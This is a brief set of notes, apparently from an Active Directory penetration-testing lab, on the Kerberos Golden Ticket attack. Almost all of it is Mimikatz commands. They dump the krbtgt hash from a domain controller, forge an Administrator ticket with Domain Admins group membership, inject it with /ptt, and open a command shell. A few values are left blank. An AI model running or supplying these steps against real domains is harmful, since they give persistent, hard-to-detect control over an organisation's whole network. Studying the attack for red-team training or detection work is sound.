Golden Ticket

Golden Ticket -> requires the NTLM hash of the krbtgt account (the forged TGT is signed with that key, so it stays valid until the krbtgt password is rotated)

sid = domain SID; id=500 (RID of the built-in Administrator account); group=512 (RID of Domain Admins)

# Execute mimikatz on the DC as Domain Admin to get the krbtgt hash
Invoke-Mimikatz -Command '"lsadump::lsa /patch"' -Computername dcrop-dc

privilege::debug
lsadump::lsa /patch


# On any machine (the /sid:, /krbtgt:, /id: and /groups: values are left blank below and must be filled in from the values noted above):
Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid: /krbtgt: /id: /groups: /startoffset:0 /endin:600 /renewmax:10080 /ptt"'

kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid: /krbtgt: /id: /groups: /startoffset:0 /endin:600 /renewmax:10080 /ptt

misc::cmd
